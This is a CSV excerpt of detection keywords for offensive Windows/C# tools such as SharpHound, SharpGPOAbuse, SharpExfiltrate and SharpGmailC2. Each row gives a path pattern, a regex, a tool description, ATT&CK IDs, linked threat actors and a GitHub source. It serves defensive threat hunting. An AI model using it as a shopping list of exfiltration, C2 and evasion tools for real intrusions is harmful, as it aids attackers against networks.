"*\SharpExcelibur.exe*",".{0,1000}\\SharpExcelibur\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18543"
"*\SharpExec.exe*",".{0,1000}\\SharpExec\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18544"
"*\SharpExec.exe*",".{0,1000}\\SharpExec\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18545"
"*\SharpExec.exe*",".{0,1000}\\SharpExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18546"
"*\SharpExfiltrate\*",".{0,1000}\\SharpExfiltrate\\.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","18547"
"*\SharpExShell.exe*",".{0,1000}\\SharpExShell\.exe.{0,1000}","offensive_tool_keyword","SharpExShell","SharpExShell automates the DCOM lateral movment technique which abuses ActivateMicrosoftApp method of Excel application","T1021.003 - T1218.007 - T1127.001","TA0008 - TA0009 - TA0005","N/A","N/A","Lateral Movement","https://github.com/grayhatkiller/SharpExShell","1","0","N/A","N/A","8","1","70","15","2024-05-01T23:17:25Z","2023-10-30T18:16:41Z","18548"
"*\SharpExShell.sln*",".{0,1000}\\SharpExShell\.sln.{0,1000}","offensive_tool_keyword","SharpExShell","SharpExShell automates the DCOM lateral movment technique which abuses ActivateMicrosoftApp method of Excel application","T1021.003 - T1218.007 - T1127.001","TA0008 - TA0009 - TA0005","N/A","N/A","Lateral Movement","https://github.com/grayhatkiller/SharpExShell","1","0","N/A","N/A","8","1","70","15","2024-05-01T23:17:25Z","2023-10-30T18:16:41Z","18549"
"*\SharpFinder.exe*",".{0,1000}\\SharpFinder\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18550"
"*\SharpFtpC2*",".{0,1000}\\SharpFtpC2.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","N/A","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","18551"
"*\SharpGetTitle.exe*",".{0,1000}\\SharpGetTitle\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18552"
"*\SharpGhostTask*",".{0,1000}\\SharpGhostTask.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","0","N/A","N/A","10","2","114","12","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z","18553"
"*\SharpGmailC2*",".{0,1000}\\SharpGmailC2.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","N/A","10","10","260","47","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z","18554"
"*\SharpGpo.exe*",".{0,1000}\\SharpGpo\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18555"
"*\SharpGpo.exe*",".{0,1000}\\SharpGpo\.exe.{0,1000}","offensive_tool_keyword","SharpGpo","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18556"
"*\SharpGPOAbuse.exe*",".{0,1000}\\SharpGPOAbuse\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18557"
"*\SharpGPOAbuse.exe*",".{0,1000}\\SharpGPOAbuse\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18558"
"*\SharpGPOAbuse.exe*",".{0,1000}\\SharpGPOAbuse\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18559"
"*\SharpGPOAbuse.pdb*",".{0,1000}\\SharpGPOAbuse\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGPOAbuse","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18560"
"*\SharpGPOAbuse.pdb*",".{0,1000}\\SharpGPOAbuse\.pdb.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGPOAbuse","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18561"
"*\SharpGPOAbuse-master*",".{0,1000}\\SharpGPOAbuse\-master.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18562"
"*\SharpGPOAbuse-master*",".{0,1000}\\SharpGPOAbuse\-master.{0,1000}","offensive_tool_keyword","SharpGpo","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18563"
"*\SharpGraphView.sln*",".{0,1000}\\SharpGraphView\.sln.{0,1000}","offensive_tool_keyword","SharpGraphView","Microsoft Graph API post-exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/SharpGraphView","1","0","N/A","N/A","6","1","94","9","2024-07-13T12:27:38Z","2024-05-04T11:23:42Z","18564"
"*\sharpgraphview\*",".{0,1000}\\sharpgraphview\\.{0,1000}","offensive_tool_keyword","SharpGraphView","Microsoft Graph API post-exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/SharpGraphView","1","0","N/A","N/A","6","1","94","9","2024-07-13T12:27:38Z","2024-05-04T11:23:42Z","18565"
"*\SharpHandler.exe*",".{0,1000}\\SharpHandler\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18566"
"*\SharpHandler.exe*",".{0,1000}\\SharpHandler\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18567"
"*\SharpHide.exe*",".{0,1000}\\SharpHide\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18568"
"*\SharpHose.exe*",".{0,1000}\\SharpHose\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18569"
"*\SharpHose.exe*",".{0,1000}\\SharpHose\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18570"
"*\SharpHose.exe*",".{0,1000}\\SharpHose\.exe.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","N/A","N/A","10","4","312","62","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z","18571"
"*\SharpHose\Program.cs*",".{0,1000}\\SharpHose\\Program\.cs.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","N/A","N/A","10","4","312","62","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z","18572"
"*\SharpHound.exe*",".{0,1000}\\SharpHound\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18573"
"*\SharpHound.exe*",".{0,1000}\\SharpHound\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18574"
"*\SharpHound.exe*",".{0,1000}\\SharpHound\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18575"
"*\SharpHound.exe*",".{0,1000}\\SharpHound\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18576"
"*\SharpHound.exe*",".{0,1000}\\SharpHound\.exe.{0,1000}","offensive_tool_keyword","sharphound","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18577"
"*\SharpHound.html*",".{0,1000}\\SharpHound\.html.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","N/A","10","6","534","62","2025-03-10T07:32:22Z","2024-01-10T08:04:57Z","18578"
"*\SharpHound.pdb*",".{0,1000}\\SharpHound\.pdb.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","18579"
"*\SharpHound.pdb*",".{0,1000}\\SharpHound\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18580"
"*\SharpHound.pdb*",".{0,1000}\\SharpHound\.pdb.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","18581"
"*\SharpHound.pdb*",".{0,1000}\\SharpHound\.pdb.{0,1000}","offensive_tool_keyword","sharphound","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18582"
"*\SharpHound.ps1*",".{0,1000}\\SharpHound\.ps1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","18583"
"*\SharpHoundCommon\*",".{0,1000}\\SharpHoundCommon\\.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","18584"
"*\SharpHound-v*.zip*",".{0,1000}\\SharpHound\-v.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","18585"
"*\SharpIncrease.exe*",".{0,1000}\\SharpIncrease\.exe.{0,1000}","offensive_tool_keyword","SharpIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/mertdas/SharpIncrease","1","0","N/A","N/A","6","2","148","30","2024-06-28T21:36:46Z","2023-03-14T23:35:32Z","18586"
"*\SharpIncrease.sln*",".{0,1000}\\SharpIncrease\.sln.{0,1000}","offensive_tool_keyword","SharpIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/mertdas/SharpIncrease","1","0","N/A","N/A","6","2","148","30","2024-06-28T21:36:46Z","2023-03-14T23:35:32Z","18587"
"*\Sharpire.exe*",".{0,1000}\\Sharpire\.exe.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - 